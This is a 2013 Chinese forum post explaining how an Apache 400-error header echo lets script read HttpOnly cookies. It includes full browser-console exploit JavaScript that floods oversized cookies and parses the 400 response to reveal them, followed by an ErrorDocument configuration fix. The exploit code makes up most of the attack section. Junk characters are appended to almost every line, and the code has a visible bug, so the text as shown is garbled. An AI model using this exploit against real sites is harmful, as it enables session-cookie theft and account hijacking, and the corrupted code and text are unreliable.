很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。% h8 ` h1 h. }: ~: \$ B
' y% L3 j5 o# h$ o/ Z6 r3 @
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
) m; w- `. t1 n" p+ b
, I: A9 }# O- T0 B- @( z$ N7 q1 Y' x" m; v5 O) C
// http://www.exploit-db.com/exploits/18442/& A5 u/ M0 L. l J5 ?
function setCookies (good) {
. f- R8 V* B" y1 W8 I( L// Construct string for cookie value
% f* d" m; h' e- Avar str = "";4 T9 e c# D! S: k: H- o& g: K
for (var i=0; i< 819; i++) {5 n; W+ A) G3 k2 U4 r
str += "x";9 M$ Y/ R- z) [- u+ G' ?- ]
}# I2 l& \' t, Z$ I2 B
// Set cookies
; N1 o4 B* }. y3 ?for (i = 0; i < 10; i++) {+ K% ~* P; q: N+ Z8 z/ _! R d
// Expire evil cookie
; s/ V: f1 q+ M" d: h2 Y( W; _1 kif (good) {
. e) Y( Z! ^1 I G6 [# O6 nvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";: M, J8 {; H; J2 @& Y9 Q, q
}
$ \6 m% E2 z1 E0 I5 }, B' C// Set evil cookie* l6 F" E0 B, V
else {! a: L1 L: H, M8 [; g% o# V6 @3 A; x
var cookie = "xss"+i+"="+str+";path=/";
: d: a; ~7 j, S) L% f}, W7 w, C j8 z+ Q0 k! P
document.cookie = cookie;9 i2 o, n$ n. K4 r6 d4 r
}5 a: s) J: `+ n3 s
}4 _' }$ P0 M0 I$ P4 F
function makeRequest() {% h7 v* A+ h# m8 ?
setCookies();' Y: t6 r/ x& H/ Z& ?
function parseCookies () {( J; o$ f* y1 V' @
var cookie_dict = {};
% F4 H1 R" y8 @; `# r. G// Only react on 400 status8 @/ b$ R. b9 J+ z4 _# B \8 f
if (xhr.readyState === 4 && xhr.status === 400) {# _$ `& O8 ^# p% \0 E) J+ Q; \! G
// Replace newlines and match <pre> content
4 Z2 Z: f/ f' O% q7 t2 W( dvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
% Q4 r0 B6 z$ \" y7 I" F- s; l W/ Kif (content.length) {
/ g0 V# i& p2 q$ h- y// Remove Cookie: prefix
1 h& @0 G( V1 t) R) Ncontent = content[1].replace("Cookie: ", "");
$ v0 w7 j1 w5 J0 {var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
' A( v7 a3 j0 s. X0 `7 j% M" q- D// Add cookies to object
~. K% x' c2 ^for (var i=0; i<cookies.length; i++) {$ U$ [6 f0 _; s! ?
var s_c = cookies.split('=',2);
5 s' @ E! k* z( U( Q1 Tcookie_dict[s_c[0]] = s_c[1];& B' n7 e7 m4 {4 y1 F& Q
}+ a' X8 ]' z/ K3 i! s R0 y! N5 c
}
4 k: }- @$ y6 x! T* b// Unset malicious cookies/ R0 J7 g5 V+ h7 V( g# `: W+ F9 p
setCookies(true);1 {, ~& o$ H( K: N
alert(JSON.stringify(cookie_dict));# K9 ^% @/ D+ B8 n: h5 X/ d; d5 ~
}6 `- s. a' ?$ F' {1 C* J* n) h- v, l
}
: `7 {6 R2 G7 s) M$ k: J5 m' R// Make XHR request' x7 g/ B3 M2 N0 O# o
var xhr = new XMLHttpRequest();0 @) _3 ^( _ \ x
xhr.onreadystatechange = parseCookies;
7 K9 K5 m* K# |0 |2 @- c, Gxhr.open("GET", "/", true);$ M- X7 C# O+ v4 J
xhr.send(null);: W0 K3 u/ c3 K( S
}
6 T, M* @- s/ z7 ?makeRequest();
* P; \ k" o0 e& c7 C( {$ \
& z4 b0 X3 e( K0 W! E. V0 s/ f你就能看见华丽丽的400错误包含着cookie信息。- j( X. k+ q9 c X5 M
3 y. ^5 E, x+ v
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#9 V% y# j" c$ A1 l% V0 v5 H
7 e( I& M* c( Y
修复方案:
/ ^1 J7 G; V, W# w) e; o
3 A; _8 Q/ ?2 H0 \8 {. `# KApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
. R% g$ b' f. g& G% \/ @
+ I* F N* x* U$ m, OIn the event of a problem or error, Apachecan be configured to do one of four things,7 y* d/ g6 I: ]# p! y. v
5 U* J1 I1 G+ D& [" f3 d+ d0 \* ]
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
* o" @. h% N5 e) D, w5 r) e( E" }2. output acustomized message输出一段信息7 D# g- M, ~' ]1 h+ v! C, B
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
1 d! O' q2 i; r' `) b5 ~. h4. redirect to an external URL to handle theproblem/error转向一个外部URL: s* h7 ?8 O6 L( B- o! U( X
5 ^3 s8 R4 C) ^1 V
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容" v2 l# o. p& R9 @# Y
h- K: F* N- N$ B0 i+ O& b" G
Apache配置:
, Y% k7 B3 |! _/ s( B# X4 X9 c( X" i3 `' [
ErrorDocument400 " security test"5 w% V3 `/ A1 D" U
; J2 a% P7 B$ |' ?
当然,升级apache到最新也可:)。+ H0 X: w* v3 a7 w
8 h, l, W8 Q* h Y$ [! n参考:http://httpd.apache.org/security/vulnerabilities_22.html
( A; v, { m: t) ~
" W- w! E4 S' w- J |
发表于 2013-4-19 19:15:43
收藏
支持
反对